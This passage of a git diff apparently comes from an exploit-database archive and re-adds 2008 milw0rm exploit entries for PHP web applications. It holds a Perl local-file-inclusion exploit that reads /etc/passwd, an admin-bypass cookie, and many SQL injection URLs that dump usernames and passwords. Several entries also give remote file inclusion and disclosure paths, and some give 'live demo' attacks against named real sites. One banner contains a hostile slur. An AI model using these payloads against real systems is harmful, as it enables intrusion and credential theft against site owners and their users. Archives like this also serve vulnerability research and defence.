] + H312Y yooogy mousekill }^-^{ k1tk4t + skulmatic olibekas ulga Cungkee str0ke + + +=========================================================================================== + +# milw0rm.com [2008-10-06] diff --git a/platforms/php/webapps/6687.pl b/platforms/php/webapps/6687.pl index 8e1255cfa..cdb99dbb9 100755 --- a/platforms/php/webapps/6687.pl 
+++ b/platforms/php/webapps/6687.pl 
@@ -1,53 +1,53 @@ -#! /usr/bin/perl -# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -# Yerba SACphp <= 6.3 / Local File Inclusion Exploit -# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -# Program: Yerba SACphp -# Version: <= 6.3 -# File affected: index.php -# Download: http://sourceforge.net/projects/yerba/ -# -# -# Found by Pepelux -# eNYe-Sec - www.enye-sec.org -# -# Bug: -# 37- include("modulos/$mod/mod_nucleo.php"); - - -use LWP::UserAgent; -use HTTP::Request::Common; - -my ($host, $file) = @ARGV ; - -unless($ARGV[1]){ - print "\nUsage: perl $0 \n"; - print "\tex: perl $0 http://localhost /etc/passwd\n\n"; - exit 1; -} - -$host = 'http://'.$host if ($host !~ /^http:/); -$host .= "/" if ($host !~ /\/\$/); - -my $ua = LWP::UserAgent->new(); -$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1"); -$ua->timeout(10); - -my $request = HTTP::Request->new(); -my $response; -my $url = $host."index.php"; - -my $req = HTTP::Request->new(POST => $host."index.php"); -$req->content_type('application/x-www-form-urlencoded'); -$req->content("mod=../../../../../".$file."%00"); - -$request = $ua->request($req); -$result = $request->content; - -$result =~ s/<[^>]*>//g; - -print $result . "\n"; - -exit; - -# milw0rm.com [2008-10-06] +#! 
/usr/bin/perl +# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= +# Yerba SACphp <= 6.3 / Local File Inclusion Exploit +# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= +# Program: Yerba SACphp +# Version: <= 6.3 +# File affected: index.php +# Download: http://sourceforge.net/projects/yerba/ +# +# +# Found by Pepelux +# eNYe-Sec - www.enye-sec.org +# +# Bug: +# 37- include("modulos/$mod/mod_nucleo.php"); + + +use LWP::UserAgent; +use HTTP::Request::Common; + +my ($host, $file) = @ARGV ; + +unless($ARGV[1]){ + print "\nUsage: perl $0 \n"; + print "\tex: perl $0 http://localhost /etc/passwd\n\n"; + exit 1; +} + +$host = 'http://'.$host if ($host !~ /^http:/); +$host .= "/" if ($host !~ /\/\$/); + +my $ua = LWP::UserAgent->new(); +$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1"); +$ua->timeout(10); + +my $request = HTTP::Request->new(); +my $response; +my $url = $host."index.php"; + +my $req = HTTP::Request->new(POST => $host."index.php"); +$req->content_type('application/x-www-form-urlencoded'); +$req->content("mod=../../../../../".$file."%00"); + +$request = $ua->request($req); +$result = $request->content; + +$result =~ s/<[^>]*>//g; + +print $result . "\n"; + +exit; + +# milw0rm.com [2008-10-06] diff --git a/platforms/php/webapps/6691.txt b/platforms/php/webapps/6691.txt index 1b03a0745..76b9df376 100755 --- a/platforms/php/webapps/6691.txt +++ b/platforms/php/webapps/6691.txt 
@@ -1,21 +1,21 @@ - [*]~======================================================~[*] - [*] Yerba SACphp <= 6.3 Multiple Remote Vulnerabilities [*] - [*]~======================================================~[*] - - [?] Discovered By StAkeR - StAkeR[at]hotmail[dot]it - [?] Discovered On 07/10/2008 - [?] http://downloads.sourceforge.net/yerba/SACphp-6_28.tgz?modtime=1025222400&big_mirror=0 - - [?] Admin Login ByPass - [?] javascript:document.cookie="galleta[sesion]=MToxOkFkbWluaXN0cmFkb3IgZGVsIFNpc3RlbWE6Jw==" - - [?] Privilege Escalation - [?] index.php?SID=[path (base64 encoded)] - - [?] Arbitrary Database Download - [?] index.php?SID=Jm9kbGFwc2VyPXhmJmFtZXRzaXM9cG9tJm5pbWRBQkR5PWRvbQ== - - [?] Arbitrary Add Admin - [?] index.php?SID=JnJhZ2VyZ2E9eGYmYW1ldHNpcz1wb20mc29pcmF1c1V5PWRvbQ== - -# milw0rm.com [2008-10-07] + [*]~======================================================~[*] + [*] Yerba SACphp <= 6.3 Multiple Remote Vulnerabilities [*] + [*]~======================================================~[*] + + [?] Discovered By StAkeR - StAkeR[at]hotmail[dot]it + [?] Discovered On 07/10/2008 + [?] http://downloads.sourceforge.net/yerba/SACphp-6_28.tgz?modtime=1025222400&big_mirror=0 + + [?] Admin Login ByPass + [?] javascript:document.cookie="galleta[sesion]=MToxOkFkbWluaXN0cmFkb3IgZGVsIFNpc3RlbWE6Jw==" + + [?] Privilege Escalation + [?] index.php?SID=[path (base64 encoded)] + + [?] Arbitrary Database Download + [?] index.php?SID=Jm9kbGFwc2VyPXhmJmFtZXRzaXM9cG9tJm5pbWRBQkR5PWRvbQ== + + [?] Arbitrary Add Admin + [?] index.php?SID=JnJhZ2VyZ2E9eGYmYW1ldHNpcz1wb20mc29pcmF1c1V5PWRvbQ== + +# milw0rm.com [2008-10-07] diff --git a/platforms/php/webapps/6692.txt b/platforms/php/webapps/6692.txt index dd89c64a9..2121e6c2e 100755 --- a/platforms/php/webapps/6692.txt +++ b/platforms/php/webapps/6692.txt 
@@ -1,16 +1,16 @@ -Name : Joomla Component com_hotspots (w) Remote SQL Injection Vulnerability -Author : cOndemned -Data : 07.10.2008 AD -Greetz : sid.psycho, h07, ZaBeaTy, irk4z, Necro, str0ke, t0pP8uZz, TWT, suN8Hclf, 0in and Avantura.... - - -PoC : - - http://[host]/index.php?Itemid=53&option=com_hotspots&task=w&w=5+and+1=2+union+select+concat(username,0x3a,password)+from+jos_users-- - - - -Just 4 fun - - -# milw0rm.com [2008-10-07] +Name : Joomla Component com_hotspots (w) Remote SQL Injection Vulnerability +Author : cOndemned +Data : 07.10.2008 AD +Greetz : sid.psycho, h07, ZaBeaTy, irk4z, Necro, str0ke, t0pP8uZz, TWT, suN8Hclf, 0in and Avantura.... + + +PoC : + + http://[host]/index.php?Itemid=53&option=com_hotspots&task=w&w=5+and+1=2+union+select+concat(username,0x3a,password)+from+jos_users-- + + + +Just 4 fun + + +# milw0rm.com [2008-10-07] diff --git a/platforms/php/webapps/6693.txt b/platforms/php/webapps/6693.txt index 2be218bf8..a1bb4f340 100755 --- a/platforms/php/webapps/6693.txt +++ b/platforms/php/webapps/6693.txt 
@@ -1,45 +1,45 @@ -________ ._. -\______ \_______ ____ ______ ______ ____ ____ | | - | | \_ __ \/ _ \\____ \/ ___// __ \_/ ___\ | | - | ` \ | \( <_> ) |_> >___ \\ ___/\ \___ \| -/_______ /__| \____/| __/____ >\___ >\___ > __ - \/ |__| \/ \/ \/ \/ -.____ ___. -| | _____ \_ |__ ______ -| | \__ \ | __ \ / ___/ -| |___ / __ \| \_\ \\___ \ -|_______ (____ /___ /____ > - \/ \/ \/ \/ - ----------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[] - ------[]===========[]=> Yourownbux v4.0 Blind SQL Injection Vulnerability ( referrals.php ) - ------[]===========[]=> Discovered By: Tec-n0x - Contact: Tec-n0x hotmail com - ------[]===========[]=> DropSec.com =~ Lab's ..!! - ------[]===========[]=> Gr33tz: - Celciuz, MurdeR, OzX, N.O.X, JosS, DDoS && All Friends - - Special Gr33tz to: C1c4tr1Z ( http://lowsec.org ) - ----------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[] - - POC: - - Go to => http://site.com/referrals.php ( Logged in ) - javascript:document.cookie="usNick=' AND 1=0 /*; expires=Thu, 2 Aug 2020 20:45:20 UTC; path=/"; - - => Modify : ' AND 1=0 /* With Injection's. - - => Example: ' AND ascii(substring((SELECT password FROM yob_users where id=1),1,1))=100 /* - - => When You got the Hash ... Add the cookie usNick with the user [ Extract it with blind if you dont know ] - and the SHA1 Hash ( Exploit is going to be available Next Week on DropSec.com ). - ----------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[] - - -# milw0rm.com [2008-10-07] +________ ._. +\______ \_______ ____ ______ ______ ____ ____ | | + | | \_ __ \/ _ \\____ \/ ___// __ \_/ ___\ | | + | ` \ | \( <_> ) |_> >___ \\ ___/\ \___ \| +/_______ /__| \____/| __/____ >\___ >\___ > __ + \/ |__| \/ \/ \/ \/ +.____ ___. 
+| | _____ \_ |__ ______ +| | \__ \ | __ \ / ___/ +| |___ / __ \| \_\ \\___ \ +|_______ (____ /___ /____ > + \/ \/ \/ \/ + +---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[] + +-----[]===========[]=> Yourownbux v4.0 Blind SQL Injection Vulnerability ( referrals.php ) + +-----[]===========[]=> Discovered By: Tec-n0x + Contact: Tec-n0x hotmail com + +-----[]===========[]=> DropSec.com =~ Lab's ..!! + +-----[]===========[]=> Gr33tz: + Celciuz, MurdeR, OzX, N.O.X, JosS, DDoS && All Friends + + Special Gr33tz to: C1c4tr1Z ( http://lowsec.org ) + +---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[] + + POC: + + Go to => http://site.com/referrals.php ( Logged in ) + javascript:document.cookie="usNick=' AND 1=0 /*; expires=Thu, 2 Aug 2020 20:45:20 UTC; path=/"; + + => Modify : ' AND 1=0 /* With Injection's. + + => Example: ' AND ascii(substring((SELECT password FROM yob_users where id=1),1,1))=100 /* + + => When You got the Hash ... Add the cookie usNick with the user [ Extract it with blind if you dont know ] + and the SHA1 Hash ( Exploit is going to be available Next Week on DropSec.com ). + +---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[] + + +# milw0rm.com [2008-10-07] diff --git a/platforms/php/webapps/6694.txt b/platforms/php/webapps/6694.txt index c57b2637c..df7704d5e 100755 --- a/platforms/php/webapps/6694.txt +++ b/platforms/php/webapps/6694.txt 
@@ -1,37 +1,37 @@ -############################################################### -#################### Viva IslaM Viva IslaM #################### -## -## Remote SQL Injection Vulnerability -## -## PHP Realtor 1.5 ( view_cat.php v_cat ) -## -## http://selectdevelopment.com/ -############################################################### -############################################################### -## -## AuTh0r : Mr.SQL -## -## H0ME : WwW.PaL-HaCkEr.CoM & WwW.ReaL-HaCk.NeT -## -## Email : SQL@Hotmail.it -## -## SYRIAN Arab HACkErS -######################## -######################## -## -## -[[: Exploite :]]- -## -## www.TraGeT./view_cat.php?v_cat=1+union+select+concat_ws(0x3a,username,password)MrSQL+from+users+limit+1,1-- -## -######################## -######################## - -######################################################################################################### -######################################################################################################### - -(:: !Gr3E3E3E3E3E3E3TzZ! 
::)- - -:: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: Ghost Hacker :: MuslimS HaCkErS :: -######################################################################################################### -######################################################################################################### - -# milw0rm.com [2008-10-07] +############################################################### +#################### Viva IslaM Viva IslaM #################### +## +## Remote SQL Injection Vulnerability +## +## PHP Realtor 1.5 ( view_cat.php v_cat ) +## +## http://selectdevelopment.com/ +############################################################### +############################################################### +## +## AuTh0r : Mr.SQL +## +## H0ME : WwW.PaL-HaCkEr.CoM & WwW.ReaL-HaCk.NeT +## +## Email : SQL@Hotmail.it +## +## SYRIAN Arab HACkErS +######################## +######################## +## +## -[[: Exploite :]]- +## +## www.TraGeT./view_cat.php?v_cat=1+union+select+concat_ws(0x3a,username,password)MrSQL+from+users+limit+1,1-- +## +######################## +######################## + +######################################################################################################### +######################################################################################################### + -(:: !Gr3E3E3E3E3E3E3TzZ! ::)- + +:: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: Ghost Hacker :: MuslimS HaCkErS :: +######################################################################################################### +######################################################################################################### + +# milw0rm.com [2008-10-07] diff --git a/platforms/php/webapps/6695.txt b/platforms/php/webapps/6695.txt index 927a76bba..466b64baa 100755 --- a/platforms/php/webapps/6695.txt +++ b/platforms/php/webapps/6695.txt 
@@ -1,37 +1,37 @@ -############################################################### -#################### Viva IslaM Viva IslaM #################### -## -## Remote SQL Injection Vulnerability -## -## PHP Auto Dealer 2.7 ( view_cat.php v_cat ) -## -## http://selectdevelopment.com/ -############################################################### -############################################################### -## -## AuTh0r : Mr.SQL -## -## H0ME : WwW.PaL-HaCkEr.CoM & WwW.ReaL-HaCk.NeT -## -## Email : SQL@Hotmail.it -## -## SYRIAN Arab HACkErS -######################## -######################## -## -## -[[: Exploite :]]- -## -## www.TraGeT./view_cat.php?v_cat=-1/**/UNION/**/SELECT/**/CONCAT_WS(0x3a,username,password)MrSQL/**/FROM/**/users/**/limit+1,1-- -## -######################## -######################## - -######################################################################################################### -######################################################################################################### - -(:: !Gr3E3E3E3E3E3E3TzZ! 
::)- - -:: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: Ghost Hacker :: MuslimS HaCkErS :: -######################################################################################################### -######################################################################################################### - -# milw0rm.com [2008-10-07] +############################################################### +#################### Viva IslaM Viva IslaM #################### +## +## Remote SQL Injection Vulnerability +## +## PHP Auto Dealer 2.7 ( view_cat.php v_cat ) +## +## http://selectdevelopment.com/ +############################################################### +############################################################### +## +## AuTh0r : Mr.SQL +## +## H0ME : WwW.PaL-HaCkEr.CoM & WwW.ReaL-HaCk.NeT +## +## Email : SQL@Hotmail.it +## +## SYRIAN Arab HACkErS +######################## +######################## +## +## -[[: Exploite :]]- +## +## www.TraGeT./view_cat.php?v_cat=-1/**/UNION/**/SELECT/**/CONCAT_WS(0x3a,username,password)MrSQL/**/FROM/**/users/**/limit+1,1-- +## +######################## +######################## + +######################################################################################################### +######################################################################################################### + -(:: !Gr3E3E3E3E3E3E3TzZ! ::)- + +:: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: Ghost Hacker :: MuslimS HaCkErS :: +######################################################################################################### +######################################################################################################### + +# milw0rm.com [2008-10-07] diff --git a/platforms/php/webapps/6696.txt b/platforms/php/webapps/6696.txt index 0b73f3168..fd06fdbbf 100755 --- a/platforms/php/webapps/6696.txt +++ b/platforms/php/webapps/6696.txt 
@@ -1,37 +1,37 @@ -############################################################### -#################### Viva IslaM Viva IslaM #################### -## -## Remote SQL Injection Vulnerability -## -## PHP Auto's V2.9.1 ( searchresults.php catid ) -## -## http://www.phpautos.com/ -############################################################### -############################################################### -## -## AuTh0r : Mr.SQL -## -## H0ME : WwW.PaL-HaCkEr.CoM & WwW.ReaL-HaCk.NeT -## -## Email : SQL@Hotmail.it -## -## SYRIAN Arab HACkErS -######################## -######################## -## -## -[[: Exploite :]]- -## -## www.TraGeT./searchresults.php?catid=-1'/**/UNION/**/SELECT/**/0,0,CONCAT_WS(0x3a,username,password,email)MrSQL,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+tblusers/* -## -######################## -######################## - -######################################################################################################### -######################################################################################################### - -(:: !Gr3E3E3E3E3E3E3TzZ! 
::)- - -:: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: Ghost Hacker :: MuslimS HaCkErS :: -######################################################################################################### -######################################################################################################### - -# milw0rm.com [2008-10-07] +############################################################### +#################### Viva IslaM Viva IslaM #################### +## +## Remote SQL Injection Vulnerability +## +## PHP Auto's V2.9.1 ( searchresults.php catid ) +## +## http://www.phpautos.com/ +############################################################### +############################################################### +## +## AuTh0r : Mr.SQL +## +## H0ME : WwW.PaL-HaCkEr.CoM & WwW.ReaL-HaCk.NeT +## +## Email : SQL@Hotmail.it +## +## SYRIAN Arab HACkErS +######################## +######################## +## +## -[[: Exploite :]]- +## +## www.TraGeT./searchresults.php?catid=-1'/**/UNION/**/SELECT/**/0,0,CONCAT_WS(0x3a,username,password,email)MrSQL,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+tblusers/* +## +######################## +######################## + +######################################################################################################### +######################################################################################################### + -(:: !Gr3E3E3E3E3E3E3TzZ! ::)- + +:: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: Ghost Hacker :: MuslimS HaCkErS :: +######################################################################################################### +######################################################################################################### + +# milw0rm.com [2008-10-07] diff --git a/platforms/php/webapps/6697.txt b/platforms/php/webapps/6697.txt index a1f3d2a7f..4a4507245 100755 --- a/platforms/php/webapps/6697.txt +++ b/platforms/php/webapps/6697.txt 
@@ -1,36 +1,36 @@ -[~]----------------------------------------------------------------------------- -[~] Built2Go PHP RealEstate v1.5 (event_detail.php) - SQL Injection Vulnerability -[~] -[~] [A professional real estate listings website. -[~] Lists homes for sale and apartments for rent, -[~] and provides a powerful search similar to the professional realtor websites. -[~] Allow visitors to list for free, or enforce free or paid registrations.] -[~] Price :- $69.95 -[~] http://www.hotscripts.com/Detailed/59295.html -[~] ---------------------------------------------------------- -[~] Bug founded by d3v1l -[~] -[~] Date: 07.10.2008 -[~] -[~] -[~] d3v1l@spoofer.com http://security-sh3ll.com -[~] -[~] ----------------------------------------------------------- -[~] Greetz tO ALL:- -[~] -[~] Security-Shell Members ( http://security-sh3ll.com/forum.php ) -[~] -[~] Pentest -[~]------------------------------------------------------------- -[~] Exploit :- -[~] -[~] http://site.com/event_detail.php?event_id=-1 UNION SELECT -1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7/* -[~] -[~] Demo :- -[~] -[~] http://www.agrents.com/event_detail.php?event_id=-1 UNION SELECT 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7/* -[~] -[~]-------------------------------------------------------------------------------------------------------------------------- - -# milw0rm.com [2008-10-07] +[~]----------------------------------------------------------------------------- +[~] Built2Go PHP RealEstate v1.5 (event_detail.php) - SQL Injection Vulnerability +[~] +[~] [A professional real estate listings website. +[~] Lists homes for sale and apartments for rent, +[~] and provides a powerful search similar to the professional realtor websites. +[~] Allow visitors to list for free, or enforce free or paid registrations.] 
+[~] Price :- $69.95 +[~] http://www.hotscripts.com/Detailed/59295.html +[~] ---------------------------------------------------------- +[~] Bug founded by d3v1l +[~] +[~] Date: 07.10.2008 +[~] +[~] +[~] d3v1l@spoofer.com http://security-sh3ll.com +[~] +[~] ----------------------------------------------------------- +[~] Greetz tO ALL:- +[~] +[~] Security-Shell Members ( http://security-sh3ll.com/forum.php ) +[~] +[~] Pentest +[~]------------------------------------------------------------- +[~] Exploit :- +[~] +[~] http://site.com/event_detail.php?event_id=-1 UNION SELECT +1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7/* +[~] +[~] Demo :- +[~] +[~] http://www.agrents.com/event_detail.php?event_id=-1 UNION SELECT 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7/* +[~] +[~]-------------------------------------------------------------------------------------------------------------------------- + +# milw0rm.com [2008-10-07] diff --git a/platforms/php/webapps/6700.txt b/platforms/php/webapps/6700.txt index e3f502762..97f061a3c 100755 --- a/platforms/php/webapps/6700.txt +++ b/platforms/php/webapps/6700.txt 
@@ -1,13 +1,13 @@ -# DFF PHP Framework API (Data Feed File) Multiple Inclusion Vulnerabilities -# Script :http://opensource.datafeedfile.com/download/DFF_PHP_FrameworkAPI-latest.zip -# Exploits : -# /DFF_PHP_FrameworkAPI-latest/include/DFF_affiliate_client_API.php?DFF_config[dir_include]= -# /DFF_PHP_FrameworkAPI-latest/include/DFF_featured_prdt.func.php?DFF_config[dir_include]= -# /DFF_PHP_FrameworkAPI-latest/include/DFF_mer.func.php?DFF_config[dir_include]= -# /DFF_PHP_FrameworkAPI-latest/include/DFF_mer_prdt.func.php?DFF_config[dir_include]= -# /DFF_PHP_FrameworkAPI-latest/include/DFF_paging.func.php?DFF_config[dir_include]= -# /DFF_PHP_FrameworkAPI-latest/include/DFF_rss.func.php?DFF_config[dir_include]= -# /DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]= -# Tryag.cc/cc - -# milw0rm.com [2008-10-08] +# DFF PHP Framework API (Data Feed File) Multiple Inclusion Vulnerabilities +# Script :http://opensource.datafeedfile.com/download/DFF_PHP_FrameworkAPI-latest.zip +# Exploits : +# /DFF_PHP_FrameworkAPI-latest/include/DFF_affiliate_client_API.php?DFF_config[dir_include]= +# /DFF_PHP_FrameworkAPI-latest/include/DFF_featured_prdt.func.php?DFF_config[dir_include]= +# /DFF_PHP_FrameworkAPI-latest/include/DFF_mer.func.php?DFF_config[dir_include]= +# /DFF_PHP_FrameworkAPI-latest/include/DFF_mer_prdt.func.php?DFF_config[dir_include]= +# /DFF_PHP_FrameworkAPI-latest/include/DFF_paging.func.php?DFF_config[dir_include]= +# /DFF_PHP_FrameworkAPI-latest/include/DFF_rss.func.php?DFF_config[dir_include]= +# /DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]= +# Tryag.cc/cc + +# milw0rm.com [2008-10-08] diff --git a/platforms/php/webapps/6701.txt b/platforms/php/webapps/6701.txt index 5e430642f..1850092fa 100755 --- a/platforms/php/webapps/6701.txt +++ b/platforms/php/webapps/6701.txt 
@@ -1,68 +1,68 @@ - || || | || - o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, - ( : / (_) / ( . - ================================== - ============================ -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| -| _ __ __ __ ______ | -| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | -| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | -| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | -| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | -| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | -| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | -| \ \____/ >> Kings of injection | -| \/___/ | -| | -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| - - -<> Found by : Cyb3r-1sT - -<> C0ntact : t3tto0 [at] yahoo.com - - cyb3r-1st [at] hotmail.com - -<> Groups : InjEctOr5 T3am - - -======================================================= -+++++++++++++ R3membeR Kings of injection ++++++++++++++ -======================================================= - - -<<->> script : textlinksads - -<<->> download : www.hispah.com/demos/textlinksads - - -======================================================= -++++++++++++++++ pwning israel fuckers ++++++++++++++++ -======================================================= - - -<<->> D0rk : find it - -<<->> Exploit :>>>>>>>>> - - for admin inf0 ::: - >>>>>>>>>>>>>>>>>>>>>>>> www.site.me/index.php?action=buy&idcat=9999999'+union+select+0,concat(username,0x3a,password)+from+admin_detail/* - - for members inf0 ::: - >>>>>>>>>>>>>>>>>>>>>>>> www.site.me/index.php?action=buy&idcat=9999999'+union+select+0,concat(username,0x3a,password)+from+reguser/* - - -======================================================= -+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++ -======================================================= - - -<<->> My best freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker - anaconda-ksa $ sirus $ crazy-x $ spk and 
all freinds - -<<->> InjEctOr5 TeaM - - -<<->> All muslims - -# milw0rm.com [2008-10-08] + || || | || + o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, + ( : / (_) / ( . + ================================== + ============================ +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| +| _ __ __ __ ______ | +| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | +| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | +| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | +| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | +| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | +| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | +| \ \____/ >> Kings of injection | +| \/___/ | +| | +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| + + +<> Found by : Cyb3r-1sT + +<> C0ntact : t3tto0 [at] yahoo.com + + cyb3r-1st [at] hotmail.com + +<> Groups : InjEctOr5 T3am + + +======================================================= ++++++++++++++ R3membeR Kings of injection ++++++++++++++ +======================================================= + + +<<->> script : textlinksads + +<<->> download : www.hispah.com/demos/textlinksads + + +======================================================= +++++++++++++++++ pwning israel fuckers ++++++++++++++++ +======================================================= + + +<<->> D0rk : find it + +<<->> Exploit :>>>>>>>>> + + for admin inf0 ::: + >>>>>>>>>>>>>>>>>>>>>>>> www.site.me/index.php?action=buy&idcat=9999999'+union+select+0,concat(username,0x3a,password)+from+admin_detail/* + + for members inf0 ::: + >>>>>>>>>>>>>>>>>>>>>>>> www.site.me/index.php?action=buy&idcat=9999999'+union+select+0,concat(username,0x3a,password)+from+reguser/* + + +======================================================= ++++++++++++++++++++++++ Greetz ++++++++++++++++++++++++ +======================================================= + + +<<->> My best freinds :: titanichacker $ arb-hawk $ 
denm0 $ drbaka $ nicehacker + anaconda-ksa $ sirus $ crazy-x $ spk and all freinds + +<<->> InjEctOr5 TeaM + + +<<->> All muslims + +# milw0rm.com [2008-10-08] diff --git a/platforms/php/webapps/6702.txt b/platforms/php/webapps/6702.txt index a9ea51a2e..1ccb90351 100755 --- a/platforms/php/webapps/6702.txt +++ b/platforms/php/webapps/6702.txt @@ -1,20 +1,20 @@ -############### >>> Remote SQL Injection <<< ########### -## SuB-ZeRo(Walid) ## -################## >>> SuB-ZeRo <<< ################ - author : SuB-ZeRo(algeria hackers) - contact : FbH@hotmail.com - - - buy script : http://www.formfields.com/adManArea/adManPricing.php -dork : find it - exploit: - www.site.me/editCampaign.php?campaignId=-2'+union+select+concat(password,0x3a,username)+from+adman_users/* - L!Ve DeMo ::: - http://www.formfields.com/adManArea/adMan1/adMan/advertiser/editCampaign.php?campaignId=-2'+union+select+concat(password,0x3a,username)+from+adman_users/* - NoTe:YoU must singup and login in web sit and you put your exploit -########### Greetz ############# ->>> SuB-ZeRo ->>>my best freinds :: x.CJP.X & ach2008 & carlos the jackel & HiSoK4 ->>> all muslims - -# milw0rm.com [2008-10-08] +############### >>> Remote SQL Injection <<< ########### +## SuB-ZeRo(Walid) ## +################## >>> SuB-ZeRo <<< ################ + author : SuB-ZeRo(algeria hackers) + contact : FbH@hotmail.com + + + buy script : http://www.formfields.com/adManArea/adManPricing.php +dork : find it + exploit: + www.site.me/editCampaign.php?campaignId=-2'+union+select+concat(password,0x3a,username)+from+adman_users/* + L!Ve DeMo ::: + http://www.formfields.com/adManArea/adMan1/adMan/advertiser/editCampaign.php?campaignId=-2'+union+select+concat(password,0x3a,username)+from+adman_users/* + NoTe:YoU must singup and login in web sit and you put your exploit +########### Greetz ############# +>>> SuB-ZeRo +>>>my best freinds :: x.CJP.X & ach2008 & carlos the jackel & HiSoK4 +>>> all muslims + +# milw0rm.com [2008-10-08] 
diff --git a/platforms/php/webapps/6703.txt b/platforms/php/webapps/6703.txt index 512fbeddd..d54fc0331 100755 --- a/platforms/php/webapps/6703.txt +++ b/platforms/php/webapps/6703.txt @@ -1,23 +1,23 @@ - _____ ____ __ __ _ ____ ____ ____ -|_ _| | _ \ \ \ / / / \ / ___| / ___| / ___| - | | | |_) | \ V / / _ \ | | _ | | | | - | | | _ < | | / ___ \ | |_| | _ | |___ | |___ - |_| |_| \_\ |_| /_/ \_\ \____| (_) \____| \____| - - -WebBiscuits Modules Controller <= 1.1 (RFI/RFD) Multiple Remote Vulnerabilities -Script : http://webbiscuits.com/download/all11.zip -I- Remote File Inclusion Vulnerability -http://xx.com/adminhead.php?path[docroot]=020.txt -And More Files .... -II- Remote File Disclosure Vulnerability -http://xx.com/faqsupport/wce.download.php?download=../../../../../../../../../../../../../etc/passwd - - ____ _ _ __ __ - / ___| ___ | | __| | | \/ | - | | _ / _ \ | | / _` | | |\/| | - | |_| | | (_) | | |___ | (_| | | | | | - \____| \___/ |_____| \__,_| _____ |_| |_| - |_____| - -# milw0rm.com [2008-10-08] + _____ ____ __ __ _ ____ ____ ____ +|_ _| | _ \ \ \ / / / \ / ___| / ___| / ___| + | | | |_) | \ V / / _ \ | | _ | | | | + | | | _ < | | / ___ \ | |_| | _ | |___ | |___ + |_| |_| \_\ |_| /_/ \_\ \____| (_) \____| \____| + + +WebBiscuits Modules Controller <= 1.1 (RFI/RFD) Multiple Remote Vulnerabilities +Script : http://webbiscuits.com/download/all11.zip +I- Remote File Inclusion Vulnerability +http://xx.com/adminhead.php?path[docroot]=020.txt +And More Files .... +II- Remote File Disclosure Vulnerability +http://xx.com/faqsupport/wce.download.php?download=../../../../../../../../../../../../../etc/passwd + + ____ _ _ __ __ + / ___| ___ | | __| | | \/ | + | | _ / _ \ | | / _` | | |\/| | + | |_| | | (_) | | |___ | (_| | | | | | + \____| \___/ |_____| \__,_| _____ |_| |_| + |_____| + +# milw0rm.com [2008-10-08] diff --git a/platforms/php/webapps/6706.php b/platforms/php/webapps/6706.php index 